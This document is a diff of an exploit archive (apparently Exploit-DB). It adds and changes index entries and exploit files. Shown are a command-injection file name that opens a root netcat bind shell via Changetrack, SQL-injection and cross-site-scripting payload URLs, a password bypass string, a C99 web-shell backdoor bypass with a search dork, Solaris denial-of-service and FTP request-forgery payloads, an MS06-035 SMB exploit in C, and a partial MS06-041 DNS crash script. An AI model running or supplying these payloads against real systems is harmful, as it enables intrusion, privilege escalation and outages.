+33892,platforms/windows/local/33892.rb,".NET Deployment Service - IE Sandbox Escape (MS14-009)",2014-06-27,metasploit,windows,local,0
-33893,platforms/windows/local/33893.rb,"MS13-097 Registry Symlink IE Sandbox Escape",2014-06-27,metasploit,windows,local,0
+33893,platforms/windows/local/33893.rb,"Registry Symlink - IE Sandbox Escape (MS13-097)",2014-06-27,metasploit,windows,local,0
 33894,platforms/multiple/webapps/33894.txt,"Python CGIHTTPServer Encoded Path Traversal",2014-06-27,"RedTeam Pentesting",multiple,webapps,0
 33895,platforms/cgi/webapps/33895.txt,"Mailspect Control Panel 4.0.5 - Multiple Vulnerabilities",2014-06-27,"BGA Security",cgi,webapps,20001
 33896,platforms/php/webapps/33896.txt,"Wordpress Simple Share Buttons Adder Plugin 4.4 - Multiple Vulnerabilities",2014-06-27,dxw,php,webapps,80
@ -30640,3 +30639,11 @@ id,file,description,date,author,platform,type,port
 34016,platforms/php/webapps/34016.txt,"Snipe Gallery 3.1 gallery.php cfg_admin_path Parameter Remote File Inclusion",2010-05-20,"Sn!pEr.S!Te Hacker",php,webapps,0
 34017,platforms/php/webapps/34017.txt,"Snipe Gallery 3.1 image.php cfg_admin_path Parameter Remote File Inclusion",2010-05-20,"Sn!pEr.S!Te Hacker",php,webapps,0
 34018,platforms/hardware/remote/34018.txt,"U.S.Robotics USR5463 0.06 Firmware setup_ddns.exe HTML Injection Vulnerability",2010-05-20,SH4V,hardware,remote,0
 34021,platforms/php/webapps/34021.txt,"Joomla! 'com_horses' Component 'id' Parameter SQL Injection Vulnerability",2010-05-19,"Kernel Security Group",php,webapps,0
 34022,platforms/php/webapps/34022.txt,"StivaSoft Stiva SHOPPING CART 1.0 'demo.php' Cross Site Scripting Vulnerability",2010-01-13,PaL-D3v1L,php,webapps,0
 34023,platforms/php/webapps/34023.txt,"Lisk CMS 4.4 'id' Parameter Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2010-05-20,"High-Tech Bridge SA",php,webapps,0
 34024,platforms/php/webapps/34024.txt,"Triburom 'forum.php' Cross Site Scripting Vulnerability",2010-01-15,"ViRuSMaN ",php,webapps,0
 34025,platforms/php/webapps/34025.txt,"C99.php Shell - Authentication Bypass",2014-07-10,Mandat0ry,php,webapps,0
 34027,platforms/solaris/dos/34027.txt,"Sun Solaris 10 Nested Directory Tree Local Denial of Service Vulnerability",2010-05-21,"Maksymilian Arciemowicz",solaris,dos,0
 34028,platforms/solaris/dos/34028.txt,"Sun Solaris 10 'in.ftpd' Long Command Handling Security Vulnerability",2010-05-21,"Maksymilian Arciemowicz",solaris,dos,0
 34029,platforms/php/webapps/34029.txt,"Specialized Data Systems Parent Connect 2010.04.11 Multiple SQL Injection Vulnerabilities",2010-05-21,epixoip,php,webapps,0
--- a/platforms/generator/shellcode/13287.txt
+++ b/platforms/generator/shellcode/13287.txt
@ -1,19 +0,0 @@
 Download & Exec polymorphed shellcode engine POC
 This downloading and execution code is not detectable by popular AVs.
 Greetz 2:
 DarkEagle and Unl0ck researcherz;
 Str0ke and milw0rm;
 HD Moor and metasploit project;
 Maxus, Fuchunic, YrSam, Garry;
 Offtopic and PTT team;
 ---
 10X 2:
 Batched for shellcode papperz;
 Flat assembler project for best'n'fast compiler
 ---
 Phrase of day:
 In code we fast ;D ;D ;D
 http://www.exploit-db.com/sploits/01242007-shell.tar.gz
 # milw0rm.com [2007-01-24]
--- a/platforms/linux/local/9709.txt
+++ b/platforms/linux/local/9709.txt
@ -1,57 +1,57 @@
-TITLE:
+TITLE:
-Changetrack Privilege Escalation Vulnerability
+Changetrack Privilege Escalation Vulnerability
-
+
-SECUNIA ADVISORY ID:
+SECUNIA ADVISORY ID:
-SA36756
+SA36756
-
+
-VERIFY ADVISORY:
+VERIFY ADVISORY:
-http://secunia.com/advisories/36756/
+http://secunia.com/advisories/36756/
-
+
-DESCRIPTION:
+DESCRIPTION:
-A vulnerability has been discovered in Changetrack, which can be
+A vulnerability has been discovered in Changetrack, which can be
-exploited by malicious, local users to gain escalated privileges.
+exploited by malicious, local users to gain escalated privileges.
-
+
-The application does not properly escape certain file names, which
+The application does not properly escape certain file names, which
-can be exploited to inject and execute arbitrary shell commands
+can be exploited to inject and execute arbitrary shell commands
-(potentially with "root" privileges) by creating a maliciously named
+(potentially with "root" privileges) by creating a maliciously named
-file in a directory tracked by Changetrack.
+file in a directory tracked by Changetrack.
-
+
-Successful exploitation requires write privileges to a directory
+Successful exploitation requires write privileges to a directory
-scanned by Changetrack.
+scanned by Changetrack.
-
+
-SOLUTION:
+SOLUTION:
-Use Changetrack to track trusted directories only.
+Use Changetrack to track trusted directories only.
-
+
-PROVIDED AND/OR DISCOVERED BY:
+PROVIDED AND/OR DISCOVERED BY:
-Marek Grzybowski
+Marek Grzybowski
-
+
-
+
--------------------------------------------------------------------------------
+--------------------------------------------------------------------------------
-Example of exploitation:
+Example of exploitation:
-
+
------------ Attacker ----------
+------------ Attacker ----------
-
+
-rick@testmachine:~/testt$ touch "<\`nc -l -p 5001 -e \$SHELL\`"
+rick@testmachine:~/testt$ touch "<\`nc -l -p 5001 -e \$SHELL\`"
-rick@testmachine:~/testt$ ls
+rick@testmachine:~/testt$ ls
-<`nc -l -p 5001 -e $SHELL`
+<`nc -l -p 5001 -e $SHELL`
-
+
--------------------------------
+--------------------------------
-
+
-
+
------------ root --------------
+------------ root --------------
-
+
-testmachine:~# changetrack 
+testmachine:~# changetrack 
-
+
------------ root --------------
+------------ root --------------
-
+
-
+
-
+
------------ Attacker ----------
+------------ Attacker ----------
-
+
-rick@testmachine:~/testt$ nc 127.0.0.1 5001
+rick@testmachine:~/testt$ nc 127.0.0.1 5001
-id
+id
-uid=0(root) gid=0(root) groups=0(root)
+uid=0(root) gid=0(root) groups=0(root)
-
+
--------------------------------
+--------------------------------
-
+
-# milw0rm.com [2009-09-17]
+# milw0rm.com [2009-09-17]
--- a/platforms/php/webapps/34021.txt
+++ b/platforms/php/webapps/34021.txt
@ -0,0 +1,7 @@
 source: http://www.securityfocus.com/bid/40308/info
 The 'com_horses' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
 Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
 http://www.example.com/index.php?option=com_horses&task=getnames&id=-1/**/UNION/**/SELECT/**/1,2,3,4,5,6-- 
--- a/platforms/php/webapps/34022.txt
+++ b/platforms/php/webapps/34022.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/40310/info
 Stiva SHOPPING CART is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
 An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
 Stiva SHOPPING CART 1.0 is vulnerable; other versions may be affected as well.
 http://www.example.com/demo.php?id=18&p=1&cat=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E 
--- a/platforms/php/webapps/34023.txt
+++ b/platforms/php/webapps/34023.txt
@ -0,0 +1,14 @@
 source: http://www.securityfocus.com/bid/40314/info
 Lisk CMS is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to sanitize user-supplied input.
 Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 Lisk CMS 4.4 is vulnerable; other versions may also be affected. 
 The following example URIs are available:
 http://www.example.com/path_to_cp/list_content.php?cl=2%27%22%3E%3Cimg+src=x+onerror=alert%28document.cookie%29%3E
 http://www.example.com/path_to_cp/edit_email.php?&id=contact_form_214%27+--+%3Cimg+src=x+onerror=alert%28document.cookie%29%3E
 http://www.example.com/path_to_cp/cp_messages.php?action=view_inbox&id=-1+union+select+1,2,3,4,5,6,7,8,9+--+
 http://www.example.com/path_to_cp/edit_email.php?&id=X%27+union+select+1,2,3,4,5,6+--+ 
--- a/platforms/php/webapps/34024.txt
+++ b/platforms/php/webapps/34024.txt
@ -0,0 +1,7 @@
 source: http://www.securityfocus.com/bid/40316/info
 Triburom is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
 An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
 http://www.example.com/forum.php?action=liste&cat=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E 
--- a/platforms/php/webapps/34025.txt
+++ b/platforms/php/webapps/34025.txt
@ -0,0 +1,37 @@
 # Exploit Title: C99 Shell Authentication Bypass via Backdoor
 # Google Dork: inurl:c99.php
 # Date: June 23, 2014
 # Exploit Author: mandatory ( Matthew Bryant )
 # Vendor Homepage: http://ccteam.ru/
 # Software Link: https://www.google.com/
 # Version: < 1.00 beta
 # Tested on:Linux 
 # CVE: N/A
 All C99.php shells are backdoored. To bypass authentication add "?c99shcook[login]=0" to the URL. 
 e.g. http://127.0.0.1/c99.php?c99shcook[login]=0
 The backdoor:
@extract($_REQUEST["c99shcook"]);
 Which bypasses the authentication here:
 if ($login) {
    if (empty($md5_pass)) {
        $md5_pass = md5($pass);
    }
    if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) {
        if ($login_txt === false) {
            $login_txt = "";
        } elseif (empty($login_txt)) {
            $login_txt = strip_tags(ereg_replace("&nbsp;|<br>", " ", $donated_html));
        }
        header("WWW-Authenticate: Basic realm=\"c99shell " . $shver . ": " . $login_txt . "\"");
        header("HTTP/1.0 401 Unauthorized");
        exit($accessdeniedmess);
    }
 }
 For more info: http://thehackerblog.com/every-c99-php-shell-is-backdoored-aka-free-shells/
 ~mandatory
--- a/platforms/php/webapps/34029.txt
+++ b/platforms/php/webapps/34029.txt
@ -0,0 +1,11 @@
 source: http://www.securityfocus.com/bid/40324/info
 Specialized Data Systems Parent Connect is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
 Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 Parent Connect 2010.4.11 is vulnerable; other versions may also be affected. 
 The following example data is available:
 password: ' OR '1'='1 
--- a/platforms/solaris/dos/34027.txt
+++ b/platforms/solaris/dos/34027.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/40319/info
 Sun Solaris is prone to a local denial-of-service vulnerability.
 Exploiting this issue allows local users to cause denial-of-service conditions in certain filesystem commands.
 Sun Solaris 10 is affected, other versions may also be vulnerable. 
 perl -e '$a="X";for(1..8000){ ! -d $a and mkdir $a and chdir $a }' 
--- a/platforms/solaris/dos/34028.txt
+++ b/platforms/solaris/dos/34028.txt
@ -0,0 +1,166 @@
 source: http://www.securityfocus.com/bid/40320/info
 Sun Solaris 'in.ftpd' FTP server is prone to a security vulnerability that allows attackers to perform cross-site request-forgery attacks.
 An attacker can exploit this issue to perform unauthorized actions by enticing a logged-in user to visit a malicious site. This may lead to further attacks.
 Sun Solaris 10 10/09 and OpenSolaris 2009.06 are vulnerable; other versions may be affected.
 <img src="ftp://.....////SITE%20CHMOD%20777%20FILENAME">
 ftp://ftp.sun.com//////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////stat
 or
 ftp://ftp.sun.com//////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////pwd
 tested od firefox 3.6.3
 Example 2 (2048):
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 //////////////////pwd
 will be split for:
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 //////////////////
 and
 pwd
 Example 3:
 ftp://192.168.11.143///////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////////////////////////
 //////////////////////////////////////site chmod 777 .
--- a/platforms/windows/dos/2057.c
+++ b/platforms/windows/dos/2057.c
@ -1,130 +1,130 @@
-#include <stdio.h>
+#include <stdio.h>
-#include <windows.h>
+#include <windows.h>
-#include <winsock.h>
+#include <winsock.h>
-
+
-/*******************************************************************
+/*******************************************************************
-Microsoft SRV.SYS Mailslot Ring0 Memory Corruption(MS06-035) Exploit
+Microsoft SRV.SYS Mailslot Ring0 Memory Corruption(MS06-035) Exploit
-
+
-by cocoruder(frankruder_at_hotmail.com),2006.7.19
+by cocoruder(frankruder_at_hotmail.com),2006.7.19
-page:http://ruder.cdut.net
+page:http://ruder.cdut.net
-*******************************************************************/
+*******************************************************************/
-
+
-
+
-unsigned char SmbNeg[] =
+unsigned char SmbNeg[] =
-"\x00\x00\x00\x2f\xff\x53\x4d\x42\x72\x00"
+"\x00\x00\x00\x2f\xff\x53\x4d\x42\x72\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x88\x05\x00\x00\x00\x00\x00\x0c\x00\x02\x4e\x54"
+"\x00\x00\x00\x00\x88\x05\x00\x00\x00\x00\x00\x0c\x00\x02\x4e\x54"
-"\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00";
+"\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00";
-
+
-unsigned char Session_Setup_AndX_Request[]=
+unsigned char Session_Setup_AndX_Request[]=
-"\x00\x00\x00\x48\xff\x53\x4d\x42\x73\x00"
+"\x00\x00\x00\x48\xff\x53\x4d\x42\x73\x00"
-"\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\xff\xff\x88\x05\x00\x00\x00\x00\x0d\xff\x00\x00\x00\xff"
+"\x00\x00\xff\xff\x88\x05\x00\x00\x00\x00\x0d\xff\x00\x00\x00\xff"
-"\xff\x02\x00\x88\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\xff\x02\x00\x88\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x01\x00\x00\x00\x0b\x00\x00\x00\x6e\x74\x00\x70\x79\x73\x6d"
+"\x00\x01\x00\x00\x00\x0b\x00\x00\x00\x6e\x74\x00\x70\x79\x73\x6d"
-"\x62\x00";
+"\x62\x00";
-
+
-unsigned char TreeConnect_AndX_Request[]=
+unsigned char TreeConnect_AndX_Request[]=
-"\x00\x00\x00\x58\xff\x53\x4d\x42\x75\x00"
+"\x00\x00\x00\x58\xff\x53\x4d\x42\x75\x00"
-"\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\xff\xfe\x00\x08\x00\x03\x04\xff\x00\x58\x00\x08"
+"\x00\x00\x00\x00\xff\xfe\x00\x08\x00\x03\x04\xff\x00\x58\x00\x08"
-"\x00\x01\x00\x2d\x00\x00\x5c\x00\x5c\x00\x31\x00\x37\x00\x32\x00"
+"\x00\x01\x00\x2d\x00\x00\x5c\x00\x5c\x00\x31\x00\x37\x00\x32\x00"
-"\x2e\x00\x32\x00\x32\x00\x2e\x00\x35\x00\x2e\x00\x34\x00\x36\x00"
+"\x2e\x00\x32\x00\x32\x00\x2e\x00\x35\x00\x2e\x00\x34\x00\x36\x00"
-"\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00\x3f\x3f\x3f\x3f"
+"\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00\x3f\x3f\x3f\x3f"
-"\x3f\x00";
+"\x3f\x00";
-
+
-unsigned char Trans_Request[]=
+unsigned char Trans_Request[]=
-"\x00\x00\x00\x56\xff\x53\x4d\x42\x25\x00"
+"\x00\x00\x00\x56\xff\x53\x4d\x42\x25\x00"
-"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x08\x88\x05\x00\x08\x00\x00\x11\x00\x00\x01\x00\x00"
+"\x00\x00\x00\x08\x88\x05\x00\x08\x00\x00\x11\x00\x00\x01\x00\x00"
-"\x04\xe0\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x55"
+"\x04\xe0\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x55"
-"\x00\x01\x00\x55\x00\x03\x00\x01\x00\x00\x00\x00\x00\x11\x00\x5c"
+"\x00\x01\x00\x55\x00\x03\x00\x01\x00\x00\x00\x00\x00\x11\x00\x5c"
-"\x4d\x41\x49\x4c\x53\x4c\x4f\x54\x5c\x4c\x41\x4e\x4d\x41\x4e\x41";
+"\x4d\x41\x49\x4c\x53\x4c\x4f\x54\x5c\x4c\x41\x4e\x4d\x41\x4e\x41";
-
+
-
+
-unsigned char recvbuff[2048];
+unsigned char recvbuff[2048];
-
+
-
+
-
+
-
+
-
+
-void neg ( int s )
+void neg ( int s )
-{
+{
-char response[1024];
+char response[1024];
-
+
-memset(response,0,sizeof(response));
+memset(response,0,sizeof(response));
-
+
-send(s,(char *)SmbNeg,sizeof(SmbNeg)-1,0);
+send(s,(char *)SmbNeg,sizeof(SmbNeg)-1,0);
-}
+}
-
+
-void main(int argc,char **argv)
+void main(int argc,char **argv)
-{
+{
-struct sockaddr_in server;
+struct sockaddr_in server;
-SOCKET sock;
+SOCKET sock;
-DWORD ret;
+DWORD ret;
-WSADATA ws;
+WSADATA ws;
-
+
-WORD userid,treeid;
+WORD userid,treeid;
-
+
-
+
-WSAStartup(MAKEWORD(2,2),&ws);
+WSAStartup(MAKEWORD(2,2),&ws);
-
+
-sock = socket(AF_INET,SOCK_STREAM,0);
+sock = socket(AF_INET,SOCK_STREAM,0);
-if(sock<=0)
+if(sock<=0)
-{
+{
-return;
+return;
-}
+}
-
+
-server.sin_family = AF_INET;
+server.sin_family = AF_INET;
-server.sin_addr.s_addr = inet_addr(argv[1]);
+server.sin_addr.s_addr = inet_addr(argv[1]);
-server.sin_port = htons((USHORT)atoi(argv[2]));
+server.sin_port = htons((USHORT)atoi(argv[2]));
-
+
-ret=connect(sock,(struct sockaddr *)&server,sizeof(server));
+ret=connect(sock,(struct sockaddr *)&server,sizeof(server));
-if (ret==-1)
+if (ret==-1)
-{
+{
-printf("connect error!\n");
+printf("connect error!\n");
-return;
+return;
-}
+}
-
+
-neg(sock);
+neg(sock);
-
+
-recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
+recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
-
+
-ret=send(sock,(char *)Session_Setup_AndX_Request,sizeof(Session_Setup_AndX_Request)-1,0);
+ret=send(sock,(char *)Session_Setup_AndX_Request,sizeof(Session_Setup_AndX_Request)-1,0);
-if (ret<=0)
+if (ret<=0)
-{
+{
-printf("send Session_Setup_AndX_Request error!\n");
+printf("send Session_Setup_AndX_Request error!\n");
-return;
+return;
-}
+}
-recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
+recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
-
+
-userid=*(WORD *)(recvbuff+0x20); //get userid
+userid=*(WORD *)(recvbuff+0x20); //get userid
-
+
-
+
-memcpy(TreeConnect_AndX_Request+0x20,(char *)&userid,2); //update userid
+memcpy(TreeConnect_AndX_Request+0x20,(char *)&userid,2); //update userid
-
+
-
+
-ret=send(sock,(char *)TreeConnect_AndX_Request,sizeof(TreeConnect_AndX_Request)-1,0);
+ret=send(sock,(char *)TreeConnect_AndX_Request,sizeof(TreeConnect_AndX_Request)-1,0);
-if (ret<=0)
+if (ret<=0)
-{
+{
-printf("send TreeConnect_AndX_Request error!\n");
+printf("send TreeConnect_AndX_Request error!\n");
-return;
+return;
-}
+}
-recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
+recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
-
+
-treeid=*(WORD *)(recvbuff+0x1c); //get treeid
+treeid=*(WORD *)(recvbuff+0x1c); //get treeid
-
+
-memcpy(Trans_Request+0x20,(char *)&userid,2); //update userid
+memcpy(Trans_Request+0x20,(char *)&userid,2); //update userid
-memcpy(Trans_Request+0x1c,(char *)&treeid,2); //update treeid
+memcpy(Trans_Request+0x1c,(char *)&treeid,2); //update treeid
-
+
-ret=send(sock,(char *)Trans_Request,sizeof(Trans_Request)-1,0);
+ret=send(sock,(char *)Trans_Request,sizeof(Trans_Request)-1,0);
-if (ret<=0)
+if (ret<=0)
-{
+{
-printf("send Trans_Request error!\n");
+printf("send Trans_Request error!\n");
-return;
+return;
-}
+}
-recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
+recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
-
+
-}
+}
-
+
-// milw0rm.com [2006-07-21]
+// milw0rm.com [2006-07-21]
--- a/platforms/windows/dos/2900.py
+++ b/platforms/windows/dos/2900.py
@ -1,92 +1,92 @@
-#!/usr/bin/python
+#!/usr/bin/python
-#POC for MS06-041
+#POC for MS06-041
-#Run the python script passing the local ip address as parameter. The DNS server
+#Run the python script passing the local ip address as parameter. The DNS server
-#will start listening on this ip address for DNS hostname resolution queries.
+#will start listening on this ip address for DNS hostname resolution queries.
-#This script is for testing and educational purpose and so to test this one will
+#This script is for testing and educational purpose and so to test this one will
-#have to point the DNS resolver on the target/client to the ip address on which
+#have to point the DNS resolver on the target/client to the ip address on which
-#this script runs.
+#this script runs.
-#Open up internet explorer and type in a hostname. services.exe will crash.
+#Open up internet explorer and type in a hostname. services.exe will crash.
-#You may have to repeat this two or three times to see the crash in services.exe
+#You may have to repeat this two or three times to see the crash in services.exe
-# Tested on Windows 2000 server SP0 and SP1  inside VmWare. Could not
+# Tested on Windows 2000 server SP0 and SP1  inside VmWare. Could not
-# reproduce on SP4 though it is also vulnerable. May be I missed something :)
+# reproduce on SP4 though it is also vulnerable. May be I missed something :)
-#
+#
-# For testing/educational purpose. Author shall bear no responsibility for any screw ups
+# For testing/educational purpose. Author shall bear no responsibility for any screw ups
-# Winny Thomas ;-)
+# Winny Thomas ;-)
-
+
-import sys
+import sys
-import struct
+import struct
-import socket
+import socket
-
+
-class DNSserver:
+class DNSserver:
-       def __init__(self, localhost):
+       def __init__(self, localhost):
-               self.response = ''
+               self.response = ''
-               self.__create_socket(localhost)
+               self.__create_socket(localhost)
-
+
-       def __create_socket(self, localhost):
+       def __create_socket(self, localhost):
-               self.host = localhost
+               self.host = localhost
-               self.port = 53
+               self.port = 53
-               self.DNSsocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+               self.DNSsocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
-               self.DNSsocket.bind((self.host, self.port))
+               self.DNSsocket.bind((self.host, self.port))
-               print 'Awaiting DNS queries'
+               print 'Awaiting DNS queries'
-               print '====================\n'
+               print '====================\n'
-               while 1:
+               while 1:
-                       self.__await_query()
+                       self.__await_query()
-
+
-       def __await_query(self):
+       def __await_query(self):
-               self.Query, self.Addr = self.DNSsocket.recvfrom(1024)
+               self.Query, self.Addr = self.DNSsocket.recvfrom(1024)
-               print 'Query from: ' + str(self.Addr)
+               print 'Query from: ' + str(self.Addr)
-               self.TransactID = self.Query[0:2]
+               self.TransactID = self.Query[0:2]
-               self.__find_type(self.Query[2:])
+               self.__find_type(self.Query[2:])
-
+
-       def __find_type(self, Question):
+       def __find_type(self, Question):
-               qType = struct.unpack('>H', Question[0:2])
+               qType = struct.unpack('>H', Question[0:2])
-               if qType[0] == 256:
+               if qType[0] == 256:
-                       self.__send_response(Question[10:-4])
+                       self.__send_response(Question[10:-4])
-
+
-       def __send_response(self, sName):
+       def __send_response(self, sName):
-               self.response = self.TransactID
+               self.response = self.TransactID
-               self.response += '\x85\x80' #Flags
+               self.response += '\x85\x80' #Flags
-               self.response += '\x00\x01' #Questions
+               self.response += '\x00\x01' #Questions
-               self.response += '\x00\x02' #Answer RR's
+               self.response += '\x00\x02' #Answer RR's
